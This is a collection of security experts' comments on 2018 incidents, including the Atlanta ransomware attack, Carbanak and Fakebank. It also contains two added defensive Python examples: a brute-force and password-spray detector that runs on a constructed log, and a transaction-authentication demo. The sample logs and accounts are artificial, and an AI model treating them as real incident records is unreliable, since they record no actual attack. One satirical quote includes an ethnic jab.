“On the other side, to combat online fraudulent transactions after the account data has been stolen, businesses offering services in the card-not-present (CNP) channel need to identify customers using multi-layered technologies that include passive biometrics. This technology monitors the user’s inherent behavior, making it impossible for hackers to replicate or steal. Leveraging a fully integrated multi-layered security approach that includes passive biometrics is an effective way to make stolen information valueless to the hacker and help stop fraud.”

“For now, anyone who thinks they may have reused their MyFitnessPal password on other sites needs to change each account password and track all account activity carefully.”

Northern Ireland Assembly

It has been reported that the Northern Ireland Assembly has issued warnings to staff following cyber attacks on its IT system. External hackers attempted to access staff email accounts by brute-forcing passwords. IT security experts commented below.

Richard Walters, Chief Security Strategist at CensorNet:

“This attack shows that it doesn’t matter who people are or where they work, basic cyber security practices are still being ignored. For years now, the advice has been: don’t reuse passwords across different sites and regularly change those passwords, yet for some reason, it isn’t sinking in. Even after a similar attack on the UK Parliament last year, the Northern Ireland Assembly and its staff clearly haven’t heeded the warnings.

“Given most people cannot be trusted to undertake basic security hygiene practices themselves, organisations – whether public or private – need to take steps to make them. If the Northern Ireland Assembly had, for example, had multi-factor authentication in place then it could rest easy that, even if a hacker did try and get in, they would have an impossible task accessing any information.”

Tony Pepper, CEO at Egress:

“This attack against the Northern Ireland Assembly comes less than a year after a very similar attack on the Houses of Parliament. Both attacks have targeted email systems, trying to take advantage of staff’s weak passwords to gain access to sensitive information contained in mailboxes. Cyber criminals come back to this type of attack time and time again because human error is always the greatest area of weakness when it comes to cybersecurity.

“In this attack, and countless others, hackers were banking on poor security practices to help them through the door, such as weak or re-used passwords, and urging staff to update their credentials is simply not enough. Organisations, public or otherwise, need to put technologies and procedures in place to reduce the impact of human error. Should hackers find a weakness, organisations need to be confident that they can’t access the sensitive information that is shared via, and therefore stored in, email systems. For example, encryption that secures email content at rest is one way to protect critical assets should the worst happen and a hacker gain access. Good security should work with staff, accepting their behaviour will be unpredictable and helping them to be productive while making sure they are not letting cyber criminals access sensitive content, and in this case potentially putting the public at risk.”
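Both experts focus on prevention (MFA, encryption at rest); the other half of the picture for an attack like the one reported here is noticing the brute-force attempts against webmail accounts while they are happening. The following is an added example, not code from the Assembly or either vendor: a small detector that parses constructed mail-gateway authentication log lines (the format is an assumption) and flags two patterns, many failures against one account from one source, and one source failing once against many accounts (a password spray). A single genuine user mistyping twice and then succeeding is not flagged.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real data; the line format is assumed).
SAMPLE_LOG = """\
2018-03-27T09:00:01Z auth=fail src=203.0.113.7 user=a.smith@assembly.example
2018-03-27T09:00:02Z auth=fail src=203.0.113.7 user=a.smith@assembly.example
2018-03-27T09:00:03Z auth=fail src=203.0.113.7 user=a.smith@assembly.example
2018-03-27T09:00:04Z auth=fail src=203.0.113.7 user=a.smith@assembly.example
2018-03-27T09:00:05Z auth=fail src=203.0.113.7 user=a.smith@assembly.example
2018-03-27T09:00:06Z auth=fail src=203.0.113.7 user=a.smith@assembly.example
2018-03-27T09:01:00Z auth=fail src=198.51.100.23 user=b.jones@assembly.example
2018-03-27T09:01:01Z auth=fail src=198.51.100.23 user=c.kelly@assembly.example
2018-03-27T09:01:02Z auth=fail src=198.51.100.23 user=e.doyle@assembly.example
2018-03-27T09:01:03Z auth=fail src=198.51.100.23 user=f.byrne@assembly.example
2018-03-27T09:01:04Z auth=fail src=198.51.100.23 user=g.walsh@assembly.example
2018-03-27T09:01:05Z auth=fail src=198.51.100.23 user=h.ryan@assembly.example
this line is malformed and must be skipped
2018-03-27T09:02:00Z auth=fail src=192.0.2.10 user=d.murphy@assembly.example
2018-03-27T09:02:05Z auth=fail src=192.0.2.10 user=d.murphy@assembly.example
2018-03-27T09:02:20Z auth=ok src=192.0.2.10 user=d.murphy@assembly.example
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) auth=(?P<result>ok|fail) src=(?P<src>\S+) user=(?P<user>\S+)$"
)


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return {"ts": ts, "result": m.group("result"),
            "src": m.group("src"), "user": m.group("user")}


def max_in_window(times, window):
    """Largest number of events inside any interval of length `window`
    (two-pointer sweep over the sorted timestamps)."""
    times = sorted(times)
    best, left = 0, 0
    for right, t in enumerate(times):
        while t - times[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best


def detect(lines, window=timedelta(minutes=5), fail_threshold=5, spray_threshold=5):
    """Return sorted alert tuples: (kind, src, user_or_'*', count)."""
    per_pair = defaultdict(list)       # (src, user) -> failure timestamps
    per_src_users = defaultdict(set)   # src -> accounts it failed against
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["result"] != "fail":
            continue
        per_pair[(ev["src"], ev["user"])].append(ev["ts"])
        per_src_users[ev["src"]].add(ev["user"])

    alerts = []
    # Brute force: repeated failures against one account from one source.
    for (src, user), times in per_pair.items():
        n = max_in_window(times, window)
        if n >= fail_threshold:
            alerts.append(("brute_force", src, user, n))
    # Password spray: one source touching many distinct accounts.
    for src, users in per_src_users.items():
        if len(users) >= spray_threshold:
            alerts.append(("password_spray", src, "*", len(users)))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Thresholds and window are tuning knobs; on a real gateway they would be set from the observed baseline of legitimate failures, and the alerts would feed the same place as the MFA and lockout policy decisions.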

TalkTalk Urged To Improve Security

It has been reported today that TalkTalk has been urged to improve its security after a researcher found a “Cross Site Scripting” error allowing him to take control of a convincing-looking “” URL, which meant he could potentially trick any of the company’s webmail customers into thinking they were accessing an official TalkTalk website.

TalkTalk was apparently told about the flaw in March 2016 through a bug bounty program; however, they only fixed it this week. In response to this piece of news, IT security experts commented below.

Ondrej Kubovic, Security Awareness Specialist at ESET:

“With the growing complexity of IT environments, the number of vulnerabilities that could be found and possibly misused by attackers, is growing every day.

This can make it increasingly difficult for IT teams to address all vulnerabilities immediately. With that said, it should be a top priority to patch known major vulnerabilities as soon as possible, especially if they affect public-facing company assets.”

Leigh-Anne Galloway, Cyber Security Resilience Lead at Positive Technologies:

“Cross site scripting is a very serious vulnerability but what is more worrying is the response from TalkTalk. They have a duty of responsibility to their customers that is not only a corporate responsibility but is also mandated by regulation and legislation. Unfortunately this response, or lack thereof, is much too common, which is why public disclosure is sometimes necessary. Security researchers responsibly disclosing flaws may actually put enough pressure on the company affected to close the vulnerability, thus protecting the public.”

Brooks Wallace, Managing Director EMEA at Trusted Knight:

“This is a relatively standard phishing exercise and, as is always advised, consumers need to be vigilant when logging into websites. TalkTalk might be of the belief that the risk presented to customers from the fake website was low, but the opposite is true. Any customer could easily have mistaken this site for the real one, entered their log-in details and then have them hoovered-up by the hacker to use on the real version. On top of that, people have a habit of using the same username and password across multiple sites, so the hackers could then have gone on to brute-force multiple sites.

“A fake website popping up is not necessarily the fault of a brand, but getting rid of it is their responsibility. A lot of businesses get caught out by security 101 issues and, despite the very public consequences, many are clearly still struggling with basic cybersecurity practices.”

Leader Of $1 Billion By Hacking Gang Arrested

In response to the news that the leader of the ring behind the infamous Carbanak malware, which caused ATMs to spit out cash and caused more than 1 billion euros of losses, has been arrested in Spain, IT security experts commented below.

Mark James, Security Specialist at ESET:

“Without specifics it’s hard to say how the actual investigations work, but often in these cases it could be that the individual concerned either made an error or was lured into a scenario that enabled law enforcement to track his or her whereabouts.

Internet anonymity is not as easy as it’s made out to be; it’s virtually impossible to be completely transparent in the digital universe, especially if you are getting the attention of organisations worldwide. You also need help; many of the techniques shown here require others to physically be at the locations. With the widespread use of visual tracking around these days it’s extremely difficult to move without being filmed somewhere, especially in public places.

It’s unlikely that the money will be returned, some may if it’s able to be traced or stashed somewhere. The gangs have been working for a long time and money obtained this way has a nasty habit of being used for nefarious purposes or used to fund further bad actors.”

Ilia Kolochenko, CEO at High-Tech Bridge:

“I would remain cautiously optimistic about the news for several reasons.

First of all, it’s not crystal clear how the law enforcement agencies managed to identify and apprehend this person. Unfortunately, this arrest may not lead to mass arrests. Many cybercriminals use various methods to cover their identity in a reliable and technically untraceable manner, even among each other, so even the best investigators may not find them. Other cybercriminals, however, start exposing themselves in a pretty stupid manner, for example, by purchasing conspicuous luxury cars, boasting out loud about their criminal business in bars and casinos. Many of these hackers were caught mainly because of their imprudence and, unfortunately, not thanks to the technical capacity of our law enforcement agencies.

This case is rather an isolated arrest so far – many professional cybercriminals enjoy impunity and continue their illicit activities. Law enforcement agencies need more financial support from governments to conduct their investigatory and prosecution activities with more effectiveness and stronger results.

Last, but not least, the remaining cyber gangs will likely take additional precautionary measures to hinder and impede any pending investigations against them.”

Kaspersky Lab welcomes recent law enforcement operation against Carbanak group

“The recent success in the fight against the Carbanak cybercriminal group is very good news for the whole industry and highlights how the exchange of information between countries is especially important  in countering cybercrime,” says Sergey Golovanov, Principal Security Researcher in the Global Research & Analysis Team, Kaspersky Lab.

Carbanak is an advanced persistent threat (APT)-like campaign, using targeted attack tools to hit financial institutions around the world for the main purpose of theft.

It was uncovered in 2015 by Kaspersky Lab together with INTERPOL, Europol and a number of other law enforcement authorities, based on incidents dating back to 2013. At the time, the group was using a range of tools, including a program called Carbanak. After the publication of Kaspersky Lab’s findings in 2015, the group adapted its tools, its servers’ names and its infrastructure, and started to use Cobalt-strike malware.

The group uses social engineering techniques, such as phishing emails with malicious attachments (for example Word documents with embedded exploits), to target employees in financial institutions of interest. Once a victim is infected, the attackers install a backdoor designed for espionage, data theft and remote management of the infected system, looking for financial transaction systems.

At the time of discovery, Kaspersky Lab researchers estimated that the Carbanak group had stolen up to $1 billion. Since 2013, the group has hit more than 100 banks, e-payment systems and other financial organizations, in at least 30 countries in Europe, Asia, North and South America, and other regions, stealing billions of dollars from victims.

Based on the successful research into Carbanak, in 2016, Kaspersky Lab discovered two groups acting in a very similar way to Carbanak – Metel and GCMAN. They were attacking financial organizations using covert APT-style reconnaissance and customized malware, along with legitimate software and new, innovative schemes to cash out. Other actors have also implemented Carbanak-like techniques, tactics and procedures, for instance Lazarus and Silence.

Given the international scale of these actors’ activities, we believe that there are dozens of people involved in this cybercrime activity. Discovered artefacts in the malicious files and victims’ computers suggest that the creators of the Carbanak malware are Russian-speaking. However, to perform cybercriminal activities in each country the group generally also looked for a native speaker.

City Of Atlanta Hit With Ransomware

The City of Atlanta has been hit by a ransomware attack, causing outages across internal and customer-facing applications. The cybercriminals are requesting a payment of $6,800 to unlock each computer or $51,000 for all of the needed keys. As of now, the city hasn’t paid and has assured citizens the systems will be restored soon. The FBI is currently investigating to find out who is responsible. IT security experts commented below.

Gijsbert Janssen Van Doorn, Technology Evangelist at Zerto:

“Without a data hostage, there is no ransom – that’s the technology mindset organizations, and city authorities such as Atlanta, need to adopt to protect themselves from ransomware. Prevention plans aren’t enough as attacks build in frequency and strength and are causing irreparable damage to brand reputation and increasing risk. Instead, organizations need to invest and create full IT resilience plans, including a disaster recovery infrastructure. Being able to easily and quickly recover data from mere seconds before it was lost or disrupted can save an organization time, money and many other types of damage.”

Rob Tate, Security Researcher at WhiteHat Security:

“Ransomware is the new phishing attack. It’s a quick and easy win for bad guys that more than likely haven’t even breached your network. But the threat of bad press, reputation damage and fleeing customers is enough to incentivize companies to pay the ransom. This has caused a huge spike in ransomware threats. The bad guys aren’t dumb. They realize that there is this paranoia and fear, so it’s really easy to send an email saying ‘Send me 10 bitcoins/dollars or else,’ and inevitably, a few will actually cough up.

“Ransomware is just one specific attack scenario, and companies need to protect against ALL threats, not simply focus on a single issue. By performing a full vulnerability assessment and fixing the issues, you can protect your company from a far larger threat landscape. If 90 percent of your fence has already fallen over, what’s the use in trying to fix a hole in the 10 percent that’s left up? You need to protect against all threats, not one specific one.

“For the companies that are truly concerned about ransomware, in addition to vulnerability assessments, they can follow some easy industry best practices. Simply backing up your data and using up-to-date encryption will negate a lot of the risk of ransomware.”

Iranian Hackers

Following the news that the US Justice Department announced charges against nine Iranians and an Iranian company for attempting to hack into hundreds of universities worldwide, dozens of companies and parts of the U.S. government, IT security experts commented below.

Gabriel Gumbs, Vice President at STEALTHbits Technologies:

“It is very difficult to quantify the frequency or impact of Nation State sponsored attacks; more importantly, there is a lack of emphasis on the means by which these attacks are perpetrated. The consensus among security professionals is that passwords are a poor mechanism for securing data, and often when we hear about sophisticated attackers and their ability to penetrate systems and sensitive infrastructure the emphasis is placed on the attacker’s capabilities and less on the factors that allow skilled or unskilled attackers to be successful. A full eight percent of the targeted accounts had their credentials compromised – let’s not underestimate the attackers’ capabilities, however, let’s be clear that in all but a few cases, attackers prefer the path of least resistance and compromising credentials is still the preferred method.”

Sam Curry, CSO at Cybereason:

“Iran has committed a crime, and there’s a price to pay for that. This is a significant development for the government and other nation states should take notice that if you commit cyber crimes against the United States there is a price to pay for your actions. This is the first time our government has indicted a nation for being linked to the cyber intrusion of government offices, such as the Federal Energy Regulatory Commission and Department of Labor and that shouldn’t be overlooked.

“I expect the Iranian government to use a plausible deniability defense and claim that these rogue hacking groups aren’t affiliated with Tehran. Any nation state, Iran in this case, can say these were rogue groups, but when there is overwhelming proof, the circumstantial evidence can pile up. What’s also interesting about today’s indictments is that the 2015 nuclear deal struck between Iran, the US and six other countries lifted crippling economic sanctions in return for their disarmament of their nuclear weapon program. Many experts point toward this agreement as the main reason cyber attacks originating from Tehran have significantly diminished. But the DOJ’s announcement shows a nation that continued its hacking operations in the face of this agreement.

“When you are a “pariah nation” such as Iran you still have to keep information flowing because information is a lifeline. We now see that as a nation-state, Iran’s playbook is to ensure there is currency flowing and a flow of information. For the United States, this is a precedent in establishing the message on how we as a nation will deal with sanctions. We are a country who respects the rule of law, and with that, follow up matters.”

Atlanta Ransomware Attack

As news broke today that the FBI is investigating a ransomware attack on the city of Atlanta that shut down city government systems, IT security experts commented below.

Israel Barak, Chief Information Security officer at Cybereason: 

If WannaCry, NotPetya and BadRabbit taught us anything in 2017 it is that ransomware attacks can have devastating effects on for-profit organizations and consumers. Individually, the NotPetya attack cost organizations in excess of $1.2 billion. Globally, our estimates show that organizations and consumers paid more than $10 billion in ransoms in 2017.

While investigators explore the root cause of the ransomware attack in Atlanta, local and federal law enforcement agencies will piece together characteristics that show the tactics, techniques and procedures used to lock down many servers in Atlanta.

The best advice for organizations to prevent ransomware from victimizing their businesses is as follows:

  1. Maintain up to date backups of important files and regularly verify that the backups can be restored
  2. Refrain from downloading pirated software / paid software offered for ‘free.’
  3. Don’t download software from dubious sources.
  4. Don’t download key-gen / password cracking / license check removal software
  5. Don’t open email attachments from unknown / unexpected senders
  6. Deploy anti-malware and anti-ransomware tools

Sam Elliott, Director of Security Product Management at Atlanta-based Bomgar:

“Ransomware attacks are a reality for many businesses, and unfortunately, this instance is likely not the last. However, there are steps organizations can take to protect themselves, which include adopting least privilege or zero trust security postures and implementing robust procedures for patching software and technologies against security vulnerabilities. Maintaining a regular patching routine closes potential holes in an organization’s infrastructure, keeping attackers at bay. Infrastructure teams should also better segment their IT systems to prevent future malware from spreading laterally through connected networks, to prevent potential for extensive damage.”

Matt Walmsley, EMEA Director at Vectra:

“Ransomware spreads like wildfire, and is the most time critical of cyber threats. The ability to detect the precursor behaviours of ransomware is the only way to get ahead of the attack. Unfortunately that’s almost impossible to do using traditional manual threat hunting techniques. That’s why forward thinking enterprises are increasingly using an automated approach, using AI powered threat detection. You need to detect and respond at machine speed.”

Google Cloud Platform Security

Following Google’s announcement today of new security features for the Google Cloud Platform, with the intent of giving businesses more control over their security environment, IT security experts commented below.

Anthony James, Chief Marketing Officer at CipherCloud:

“Cloud adoption is ramping rapidly and the adoption of cloud-based applications has entered the mainstream. Each cloud vendor has a variety of cloud controls, but this gets very complicated as enterprises scale their applications across multiple clouds.

As we saw very recently with the Amazon cloud breaches involving Walmart and then subsequently with Federal Express, your data may be exposed due to human error or other unforeseen factors with any vendor. It remains essential to deploy a single unified cloud security platform that can secure enterprise data using encryption. Using tools such as cloud access security brokers (also called cloud gateways) you can encrypt data within applications, and in the event of a breach of the data within Google, Amazon or Microsoft Azure your data will remain protected. These same capabilities are also part of the critical infrastructure larger enterprises need to address challenging compliance regulations such as GDPR.”

Mark James, Security Specialist at ESET:

Should companies still use additional security, on top of what Google is offering, to protect against cyber threats?

“The fine art of cyber defence relies on multi-layered techniques designed to integrate and strengthen your security. Long gone are the days of a single magic bullet that will keep you safe from malicious intent. From my point of view anything that can be done by the “tech giants” to not only protect the individuals and their brands is a plus. If you’re able to add to your security to complement what they are doing then “go for it”. As much as we like others to do all the hard work, we need to do what we can to protect our own data, over and above what’s provided by default.”

Do you think the move will encourage more tech giants to follow suit and offer additional security controls for their customers?

“Yes, well I hope so. In this competitive world companies will need to keep up. Offering something that protects or enhances the user experience will encourage more to take up those services, and even more so as we move towards GDPR and beyond. Having a choice of companies and services only enhances the user’s security and encourages other companies to keep up and develop and grow the services they offer.”

Do you see this as a positive step from Google?

“Yes absolutely, the user needs all the help they can get and being able to utilise the expertise and knowledge of Google will only enhance their ability to protect their data, which has sadly become the modern-day “gold at the end of the rainbow”.”


Russia DDoS Election Interference Attack

The ISBuzz Post: This Post Russia DDoS Election Interference Attack appeared first on Information Security Buzz.

In response to reports of a DDoS attack launched to interfere with Russian elections, IT security experts commented below.

Sean Newman, Director of Product Management at Corero Network Security:

“Reports of DDoS attacks on the Russian, or any other government, elections come as no surprise. There’s no better time to make your point, whether it’s political, moral or otherwise, whichever side of the political fence you sit. One thing you can say though is that it’s typically virtually impossible to determine the true source of the attack, as where the DDoS traffic emanates from is almost certainly not directly related to either the attacker, those who funded the attacks, or the geographical region they are located in.

“You’re not going to stop the sources of these attacks from trying to make their point, but you can protect the integrity of the systems being used for the democratic process. The latest always-on real-time automated DDoS protection solutions can keep systems online, and available for citizens to access at all times during the voting process.”

Lee Munson, Security Researcher at 

“As everyone knows by now, all the cool kids get hit by cyberattacks and so, in an attempt to look hip, The People’s Republic of Russia has claimed its very own sob story in the form of a Distributed Denial of Service attack during its recent presidential procession.

“The fifteen alleged powerful nation state virtual combatants, which may have included England, Wales, Ireland and the rebel alliance north of Hadrian’s Wall, could well have been mustering the proposed retaliation for the recent Salisbury poisoning of someone no-one cared about, just a few short weeks ago.

“In fact, given how ineffective the cyber-attack was, I’m pretty sure the combined power of the UK must have been behind it, especially given all the fake news in the British press about how Putin would be re-elected before a single vote had been cast.

“Next week, I expect the same attackers to strike again, this time using puppet politicians to decry the encryption in messaging apps that allowed those nasty vodka-swilling Ruskies to influence the real democratic election across the pond that saw our American friends get exactly what they deserved.”


New Fakebank Android Malware

The ISBuzz Post: This Post New Fakebank Android Malware appeared first on Information Security Buzz.

Late last week researchers at Symantec warned of a new variant of the Fakebank Android malware family that has an unusual twist. Once installed, the malware will intercept mobile calls you attempt to make to your bank, and instead direct them to a scammer impersonating an agent working for the bank. Furthermore, the malware will intercept calls from the *scammers*, and display a fake caller ID to make it appear as though the call is really from the legitimate bank. IT security experts commented below.

Frederik Mennes, Senior Manager for Market and Security Strategy at VASCO:

“Banks can protect themselves against “vishing” (voice phishing) attacks by educating users, for example explaining that they shouldn’t install apps from unofficial stores, and requesting they review app privileges. However, this approach fails if the user makes a mistake. A stronger and better approach to protect against vishing consists of implementing transaction authentication, whereby the user must generate a valid dynamic authentication code in order to confirm a financial transaction. Fraudsters will have trouble convincing the user to generate and provide a valid authentication code for a fraudulent financial transaction, and hence will be stopped before doing any harm.”
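As an added illustration of the transaction authentication Mennes describes (not VASCO’s scheme and not code from the post; the device key, IBANs and amounts are constructed sample values), the code below binds an HMAC-derived authentication code to the payee, amount and a one-time challenge, so a code the user generated for the transfer they actually see does not confirm a transfer the caller has substituted:

```python
"""Transaction-bound authentication codes (dynamic linking), added example.

A vishing caller can talk a victim into reading out a code, but a code
computed over the legitimate transaction details does not verify for a
transaction with a different payee, and cannot be replayed.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Transaction:
    payee_iban: str    # constructed sample IBANs below, not real accounts
    amount_cents: int
    nonce: str         # single-use challenge issued by the bank


def _canonical(tx: Transaction) -> bytes:
    # Fixed field order and separator so fields cannot be re-split differently
    return f"{tx.payee_iban}|{tx.amount_cents}|{tx.nonce}".encode()


def generate_code(device_key: bytes, tx: Transaction, digits: int = 8) -> str:
    """User side: the authenticator signs exactly the details it displays."""
    mac = hmac.new(device_key, _canonical(tx), hashlib.sha256).digest()
    offset = mac[-1] & 0x0F                      # dynamic truncation as in RFC 4226
    value = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(value % (10 ** digits)).zfill(digits)


def verify_code(device_key: bytes, tx: Transaction, code: str, used_nonces: set) -> bool:
    """Bank side: recompute over the transaction it is about to execute."""
    if tx.nonce in used_nonces:
        return False                             # replayed challenge
    if not hmac.compare_digest(generate_code(device_key, tx), code):
        return False                             # details changed since signing
    used_nonces.add(tx.nonce)
    return True


def vishing_scenario(device_key: bytes) -> dict:
    """Legit transfer is confirmed; the caller's substituted payee and a replay are not."""
    used_nonces: set = set()
    nonce = secrets.token_hex(8)
    legit = Transaction("GB00SAMPLE0000001", 5000, nonce)   # what the user sees
    code = generate_code(device_key, legit)
    fraud = Transaction("GB00SAMPLE0000999", 5000, nonce)   # what the caller submits
    fraud_ok = verify_code(device_key, fraud, code, used_nonces)
    legit_ok = verify_code(device_key, legit, code, used_nonces)
    replay_ok = verify_code(device_key, legit, code, used_nonces)
    return {"fraud_accepted": fraud_ok, "legit_accepted": legit_ok, "replay_accepted": replay_ok}
```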

Paul Bischoff, Privacy Advocate at

“The Fakebank Android malware could soon be a model adopted by malware makers in parts of the world outside South Korea. Even though the attack uses a fairly novel approach to scam users, Android owners can avoid it using the same best practices used to avoid any other type of malware. First, update Android to the latest stable version. The newest release, Oreo, prevents the caller ID from being spoofed by the malware. Avoid downloading apps and files from unknown sources. Don’t trust apps from third-party app stores, and be wary of links in web pages and emails. It’s also important to review and limit the permissions of apps you install, and install and run antivirus regularly.”
